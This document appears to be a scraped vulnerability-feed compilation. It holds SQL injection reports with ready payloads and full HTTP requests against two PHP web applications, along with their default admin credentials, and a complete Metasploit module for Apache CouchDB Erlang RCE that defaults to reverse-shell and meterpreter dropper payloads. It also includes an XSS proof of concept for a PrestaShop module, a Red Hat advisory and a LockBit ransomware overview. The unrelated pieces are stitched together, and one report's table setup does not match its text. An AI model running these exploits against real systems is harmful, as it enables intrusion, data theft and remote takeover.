Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/classes/Master.php?f=delete_message.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Hackerwang

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

You need to create a reservation\_list table in the database first. The sql statement is as follows

CREATE TABLE \`message\_list\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /odlms/classes/Master.php?f=delete\_message

Vulnerability location: /odlms/classes/Master.php?f=delete\_message,id

dbname=odlms\_db,length=8

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Master.php?f\=delete\_message HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=4'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43066: bug_report/SQLi-2.md at main · wang1213884/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_reservation.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Hackerwang

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

You need to create a reservation\_list table in the database first. The sql statement is as follows

CREATE TABLE \`reservation\_list\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /odlms/classes/Master.php?f=delete\_reservation

Vulnerability location: /odlms/classes/Master.php?f=delete\_reservation,id

dbname=odlms\_db,length=8

\[+\] Payload: id=4' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Master.php?f\=delete\_reservation HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=4'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43068: bug_report/SQLi-1.md at main · wang1213884/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/admin/?page=appointments/view_appointment.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Happyd99

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/admin/?page=appointments/view\_appointment&id=

Vulnerability location: /odlms/admin/?page=appointments/view\_appointment&id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/admin/?page=appointments/view\_appointment&id=-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /odlms/admin/?page\=appointments/view\_appointment&id\=\-4%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43227: bug_report/SQLi-2.md at main · Happyd99/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/?page=appointments/view_appointment.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Happyd99

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/?page=appointments/view\_appointment&id=

Vulnerability location: /odlms/?page=appointments/view\_appointment&id=,id

dbname=odlms\_db,length=8

\[+\] Payload: /odlms/?page=appointments/view\_appointment&id=-5%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /odlms/?page\=appointments/view\_appointment&id\=\-5%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-43226: bug_report/SQLi-1.md at main · Happyd99/bug_report

Due to unsanitized NUL values, attackers may be able to maliciously set environment variables on Windows. In syscall.StartProcess and os/exec.Cmd, invalid environment variable values containing NUL values are not properly checked for. A malicious environment variable value can exploit this behavior to set a value for a different environment variable. For example, the environment variable string "A=B\x00C=D" sets the variables "A=B" and "C=D".

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2022-41716

Garage Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /garage/editorder.php.

**Garage Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Happyd99

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /garage/editorder.php?id=

Vulnerability location: /garage/editorder.php?id=, id

dbname = garagedb

\[+\] Payload: /garage/editorder.php?id=-1+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+ // Leak place ---> id

GET /garage/editorder.php?id\=\-1+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=m6rramo7f8jalaggbvjh84b1mm
Connection: close

CVE-2022-41551: bug_report/SQLi-1.md at main · Happyd99/bug_report

In Apache CouchDB versions prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  include Msf::Exploit::Retry  include Msf::Exploit::Powershell  prepend Msf::Exploit::Remote::AutoCheck  require 'msf/core/exploit/powershell'  require 'digest'  # Constants required for communicating over the Erlang protocol defined here:  # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html  EPM_NAME_CMD = "\x00\x01\x6e".freeze  NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".freeze  CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04".freeze  CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex".freeze  COOKIE = 'monster'.freeze  COMMAND_PREFIX = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k".freeze  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Couchdb Erlang RCE',        'Description' => %q{          In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without          authenticating and gain admin privileges.        },        'Author'  => [          'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery          '1F98D',                     # Erlang Cookie RCE exploit          'Konstantin Burov',          # Apache CouchDB Erlang Cookie exploit          '_sadshade',                 # Apache CouchDB Erlang Cookie exploit          'jheysel-r7',                # Msf Module        ],        'References' => [          [ 'EDB', '49418' ],          [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],          [ 'CVE', '2022-24706'],        ],        'License' => MSF_LICENSE,        'Platform' => ['win', 'linux'],        'Payload' => {          'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method        },        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_openssl'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => :wget,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'CmdStagerFlavor' => :certutil,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'              }            }          ],          [            'PowerShell Stager',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :psh_stager,              'CmdStagerFlavor' => :certutil,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-01-21',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      ),    )    register_options(      [        Opt::RPORT(4369)      ]    )  end  def check    erlang_ports = get_erlang_ports    # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?    erlang_ports.each do |erlang_port|      # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been      # successful and the target as well as the specific socket used in this instance is vulnerable      sock = connect_to_erlang_server(erlang_port.to_i)      if sock.instance_of?(Socket)        @vulnerable_socket = sock        return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')      else        next      end    end    Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be a patched')  end  # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers  #  # @return [Array] An array of port numbers for discovered Erlang Servers.  def get_erlang_ports    erlang_ports = []    begin      print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")      connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })      # request Erlang nodes      sock.put(EPM_NAME_CMD)      sleep datastore['WfsDelay']      res = sock.get_once      unless res && res.include?("\x00\x00\x11\x11name couchdb")        print_error('Did not find any Erlang nodes')        return erlang_ports      end      print_status('Successfully found EDPM socket')      res.each_line do |line|        erlang_ports << line.match(/\s(\d+$)/)[0]      end    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e      print_error("Error connecting to EDPM: #{e.class} #{e}")      disconnect      return erlang_ports    end    erlang_ports  end  # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the  # default erlang cookie value in Apache CouchDB installations before 3.2.2  #  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server  def connect_to_erlang_server(erlang_port)    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })    print_status('Connection successful')    challenge = retry_until_truthy(timeout: 60) do      sock.put(NAME_MSG)      sock.get_once(5) # ok message      sock.get_once    end    # The expected successful response from the target should start with \x00\x1C    unless challenge && challenge.include?("\x00\x1C")      print_error('Connecting to the Erlang server was unsuccessful')      return    end    challenge = challenge[9..12].unpack('N*')[0]    challenge_reply = "\x00\x15r\x01\x02\x03\x04"    md5 = Digest::MD5.new    md5.update(COOKIE + challenge.to_s)    challenge_reply << [md5.hexdigest].pack('H*')    sock.put(challenge_reply)    sleep datastore['WfsDelay']    challenge_response = sock.get_once    if challenge_response.nil?      print_error('Authentication was unsuccessful')      return    end    print_status('Erlang challenge and response completed successfully')    sock  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")    disconnect    return  end  def compile_cmd(cmd)    msg = ''    msg << COMMAND_PREFIX    msg << [cmd.length].pack('S>')    msg << cmd    msg << "jw\x04user"    payload = ("\x70" + CTRL_DATA + msg)    ([payload.size].pack('N*') + payload)  end  def execute_command(cmd, opts = {})    payload = compile_cmd(cmd)    print_status('Sending payload... ')    opts[:sock].put(payload)    sleep datastore['WfsDelay']  end  def exploit_socket(sock)    case target['Type']    when :unix_cmd, :win_cmd      execute_command(payload.encoded, { sock: sock })    when :linux_dropper, :win_dropper      execute_cmdstager({ sock: sock })    when :psh_stager      execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })    else      fail_with(Failure::BadConfig, 'Invalid target specified')    end  end  def exploit    # If the check method has already been run, use the vulnerable socket that has already been identified    if @vulnerable_socket      exploit_socket(@vulnerable_socket)    else      erlang_ports = get_erlang_ports      fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)      erlang_ports.each do |erlang_port|        sock = connect_to_erlang_server(erlang_port.to_i)        next unless sock.instance_of?(Socket)        exploit_socket(sock)      end    end  endend

Apache CouchDB Erlang Remote Code Execution

Red Hat Security Advisory 2022-7273-01 - Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector, the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. This release of Red Hat JBoss Web Server 5.7.0 serves as a replacement for Red Hat JBoss Web Server 5.6.1. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References. Issues addressed include denial of service and privilege escalation vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: Red Hat JBoss Web Server 5.7.0 release and security updateAdvisory ID:       RHSA-2022:7273-01Product:           Red Hat JBoss Web ServerAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:7273Issue date:        2022-11-02CVE Names:         CVE-2021-22696 CVE-2021-30468 CVE-2022-23181====================================================================1. Summary:Red Hat JBoss Web Server 5.7.0 zip release is now available for Red HatEnterprise Linux 7, Red Hat Enterprise Linux 8, and Microsoft Windows.Red Hat Product Security has rated this release as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.2. Description:Red Hat JBoss Web Server is a fully integrated and certified set ofcomponents for hosting Java web applications. It is comprised of the ApacheTomcat Servlet container, JBoss HTTP Connector (mod_cluster), thePicketLink Vault extension for Apache Tomcat, and the Tomcat Nativelibrary.This release of Red Hat JBoss Web Server 5.7.0 serves as a replacement forRed Hat JBoss Web Server 5.6.1. This release includes bug fixes,enhancements and component upgrades, which are documented in the ReleaseNotes, linked to in the References.Security Fix(es):* cxf: OAuth 2 authorization service vulnerable to DDos attacks(CVE-2021-22696)* CXF: Denial of service vulnerability in parsing JSON viaJsonMapObjectReaderWriter (CVE-2021-30468)* tomcat: local privilege escalation vulnerability (CVE-2022-23181)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s) listed in the References section.3. Solution:Before applying the update, back up your existing installation, includingall applications, configuration files, databases and database settings, andso on.The References section of this erratum contains a download link for theupdate. You must be logged in to download the update.4. Bugs fixed (https://bugzilla.redhat.com/):1946341 - CVE-2021-22696 cxf: OAuth 2 authorization service vulnerable to DDos attacks1973392 - CVE-2021-30468 CXF: Denial of service vulnerability in parsing JSON via JsonMapObjectReaderWriter2047417 - CVE-2022-23181 tomcat: local privilege escalation vulnerability5. References:https://access.redhat.com/security/cve/CVE-2021-22696https://access.redhat.com/security/cve/CVE-2021-30468https://access.redhat.com/security/cve/CVE-2022-23181https://access.redhat.com/security/updates/classification/#moderate6. Contact:The Red Hat security contact is <secalert@redhat.com>. More contactdetails at https://access.redhat.com/security/team/contact/Copyright 2022 Red Hat, Inc.-----BEGIN PGP SIGNATURE-----Version: GnuPG v1iQIVAwUBY2JowtzjgjWX9erEAQhWBA/8CvELFNc5dxnjAKg7jGjFgmCpPmh0PlqY7cquzMM2WXXSKeipmspFIl/xLWlHiyuCwozRyJ3xSmYWGUx1oA1QWZZNxZMJRRgyL1JhkP/KbZfMMY2mTXZIhDWg7cjk3wnCjmL7lEPNzo4lsYRAFnDdlYDIwA+BhrILX1lwpf2ycEH1+kjjZBjsM6Et/Yhm+LTNYxukENwWfr51UL9cuMwr6OCgBIm4gwxA+93PyjYznozGvjAOp1FhyQDIxIZe+kWZkQ8g+WSA93i+ZJBacQaGUZNiYaNFTbEBO8nCP0Aj4nXZjuFSJxA+19TyLNKl0J3yzAk1TC9PMTeuHhPNvkBX6FxKaUf+k+qkOdvtK1biU/l68YkDyNdRjzOmFQIAkuyUVurgAYIIcJOaczWd7nxHQgyMSJ53HcHSYzWccUWIPBwBFm0PLlA+rlLgKKzSZS/ZMn9OPIVM4jm5jwxSS+xKIVBkwUKMHyGyMSQR+vQynh+TlsCboPTwl2zXcaBDw8lvZ1+2qyaZ8MjZKJiCv1ZBx4EuovuidnbE51RYs0okHbqWl2puXSY0z09i0tXschd8QEOCgcfolOD1KA3h4dVuW9F2ByDWKKKrRUlG3hpL34YY+/CoiWCnA45ZI09KBrik9lWsQIakQGXCZespFKed22FHk+yL+W2lCHcSjQv5bQE=XpKY-----END PGP SIGNATURE-------RHSA-announce mailing listRHSA-announce@redhat.comhttps://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7273-01

While the ransomware-for-hire group works to create ever more efficient exploits, companies can protect themselves with structured vulnerability management processes. Prioritize threats based on severity and risk.

LockBit ransomware is in the minority group of ransomware families that leverage auto-propagating malware and double encryption methods. After its breaches into security behemoth Entrust and the Italian Revenue Agency earlier this summer, LockBit has continued to gain notoriety while on the lookout for its next victim.

LockBit ransomware began its spree of high-profile attacks as early as September 2019 and has remained one of the most prolific groups to date. Motivated by large payouts, the group doesn't fear targeting larger corporations and enterprises.

The ransomware group is known for its particular qualities of a triple-extortion method, sophisticated technology, high-severity cyberattacks, and heavy marketing to affiliates. LockBit's presence is felt globally, and industries are afforded only short moments of respite when the group retreats to develop more devastating upgrades to their toolkit. Its attack frequency and strategy make the group a force to beware of in the cybersecurity world, demonstrating its determination to cause harm.

**LockBit: The Brief**

*   LockBit markets itself as ransomware-as-a-service (RaaS). It works in conjunction with other bad actors who perform attacks for hire, and then split the funds between the LockBit developer team and other accomplices.
*   The LockBit family targets both CVE-2021-22986 and CVE-2018-13379.
*   The Russian threat actor group, TA505 (also known as Hive0065) has been observed using the LockBit ransomware payload in its attacks.

**New Variants**

LockBit's origins began as an ABCD cryptovirus in 2019. Its main targets were government organizations in North America, Europe, and APAC regions and included private companies as well, with crypto as their form of ransom payment.

Early targets of LockBit in 2019 and 2020 included Windows systems within financial and healthcare institutions. The ransomware group then took a hiatus to improve its malware kit and operation strategy. To date, two LockBit versions in addition to the initial version have been released, with each subsequent release possessing increased attack capabilities.

**LockBit 2.0**

LockBit 2.0 was introduced in June 2021 and was documented in attacks in Taiwan, Chile, and the UK. In the 2.0 version, LockBit added the double-extortion technique and auto-encryption of hardware across Windows domains for which it became known. Later in the fall of 2021, the group began branching out into Linux servers, too, specifically attacking ESXi servers.

**LockBit 3.0, Also Known as LockBit Black**

After another brief hiatus, LockBit returned in June 2022 with the release of another improved version of the ransomware, including a bug bounty program that financially incentivizes researchers to share bug reports. In addition to the program, version 3.0 includes Zcash payments and developed new extortion tactics. Building on top of architecture found in BlackMatter and DarkSide, LockBit now has refined its evasion practices, passwordless execution, and implemented command-line features.

The updated LockBit ransomware was used to attack and steal data from the Italian Revenue Agency and a county office in Ontario, Canada. On top of encryption and the threat of data leaks, the ransomware group has included denial-of-service attacks to increase the pressure on victims.

In a surprising turn of events, an alleged LockBit developer leaked the group's builder used to design the 3.0 version on Twitter, citing frustration with the group's leadership as their motivation for the leak. A blow to the group but a potential risk to the cybersecurity field as the leaked information can equip new individuals with the necessary tools to start their own ransomware kit. In no more than a week after the leak, a new ransomware group was observed using the builder to target companies.

**How Dangerous Is LockBit?**

LockBit has a diverse arsenal of technologies and techniques to go after the largest organizations, regardless of industry. Here is a snapshot of the tools, tactics, and methods that make LockBit so dangerous:

*   StealBit, a malware tool first found in the 2.0 version, was designed for encryption and is believed to be the most efficient and quickest encryption tool.
*   StealBit automatically spreads to other connected devices along a network by taking advantage of Windows PowerShell and Server Message Block.
*   LockBit's malware can now infect both Windows and Linux systems when initially it could only exploit Windows systems.
*   The creation of the bug bounty program is the group's attempt at establishing itself as a professional group of hackers while simultaneously improving its defenses.
*   LockBit 3.0 introduced Zcash payment options for ransom collection and to avoid interference from law enforcement agencies.

**How to Prevent a LockBit Attack**

*   **Curb unnecessary permissions:** More restrictions on permissions are not a bad practice to get in the habit of applying, as more levels of authentication make it difficult for remote hackers to escalate permissions and gain greater access. Pay close attention to users with IT and admin-level permissions.

*   **Monitor your attack surface:** Incorporate a solution that scans your entire attack surface for potential entry points for attackers. Routinely monitor existing and newly added assets to your organization's network.

Security leadership can keep attackers away by cultivating a culture of vigilance with structured vulnerability management processes that prioritize threats based on severity and risk. Despite LockBit's capabilities, organizations do have options when it comes to protecting their organization and partners.

Everything You Need to Know About LockBit

ndk design NdkAdvancedCustomizationFields 3.5.0 is vulnerable to Cross Site Scripting (XSS) via createPdf.php.

Permalink

\# Exploit Title: NdkAdvancedCustomizationFields Prestashop module <= 3.5.0 cross site scripting (xss)

\# Date: 01-11-2022

\# Exploit Author: dalii

\# Vendor Homepage: https://www.ndk-design.fr/

\# Software Link : https://www.ndk-design.fr/documentation-ndkadvancedcustomizationfields-prestashop-english

\# Version: 3.5.0

\# Tested on: Windows 10

\# CVE: CVE-2022-40840

Parameters: htmlNodes

Exploit:

http://localhost/modules/ndk\_advanced\_custom\_fields/createPdf.php?htmlNodes\[0\]=<script&htmlNodes\[1\]=>alert("xss\_poc")</&htmlNodes\[2\]=script>&idCustomer=..&idProduct=..&idCustomization=..

http://localhost/img/render.html

Tag

#windows